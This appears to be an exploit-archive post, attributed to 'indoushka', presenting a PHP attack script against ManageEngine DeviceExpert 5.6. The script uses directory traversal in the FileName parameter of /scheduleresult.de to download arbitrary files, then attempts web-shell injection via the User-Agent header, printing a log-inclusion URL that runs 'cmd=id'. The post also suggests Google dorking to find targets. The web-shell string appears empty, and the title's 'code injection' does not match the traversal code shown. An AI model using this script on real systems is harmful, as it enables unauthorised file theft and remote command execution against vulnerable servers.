============================================================================================================================================= | # Title : ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://download.manageengine.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Web Shell injection if the target has an LFI (Local File Inclusion) vulnerability with code execution capability, or RFI (Remote File Inclusion), or if we can write to a path that the web server can execute, such as the uploads or webroot folder on the server. ( https://packetstorm.news/files/id/181161/ ) [+] save code as poc.php. [+] Set Target : line 81 [+] USage : php poc.php [+] PayLoad : host = $host; $this->port = $port; $this->ssl = $ssl; $this->filepath = $filepath; } private function sendRequest($uri, $headers = []) { $protocol = $this->ssl ? 'https' : 'http'; $url = "$protocol://{$this->host}:{$this->port}$uri"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 25); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return [$http_code, $response]; } public function run() { $traverse = str_repeat("..\\", 10); $filename = $this->filepath; list($code, $response) = $this->sendRequest("/scheduleresult.de"); if ($code !== 200) { echo "[ERROR] Target is not ManageEngine DeviceExpert\n"; return; } list($code, $response) = $this->sendRequest("/scheduleresult.de/?FileName={$traverse}{$filename}"); if ($code === 200) { echo "[SUCCESS] {$this->host}:{$this->port} returns: $code\n"; if (!empty($response)) { $this->saveFile($response); } else { echo "[ERROR] {$this->host}:{$this->port} - no file downloaded (empty)\n"; } } elseif ($code === 404) { echo "[ERROR] {$this->host}:{$this->port} - file not found\n"; } else { echo "[ERROR] Unable to communicate with {$this->host}:{$this->port}\n"; } } private function saveFile($content) { $filename = basename($this->filepath); $path = __DIR__ . "/$filename"; file_put_contents($path, $content); echo "[SUCCESS] File saved in: $path\n"; } public function injectWebShell() { $webshell = ""; $headers = ["User-Agent: " . $webshell]; list($code, $response) = $this->sendRequest("/scheduleresult.de", $headers); if ($code === 200) { echo "[SUCCESS] Web Shell injected via User-Agent!\n"; echo "Access it at: http://{$this->host}/scheduleresult.de/?FileName=../../../../../../var/log/apache2/access.log&cmd=id\n"; } else { echo "[ERROR] Web Shell injection failed!\n"; } } } $scanner = new ManageEngineScanner('target_ip_here'); $scanner->run(); $scanner->injectWebShell(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================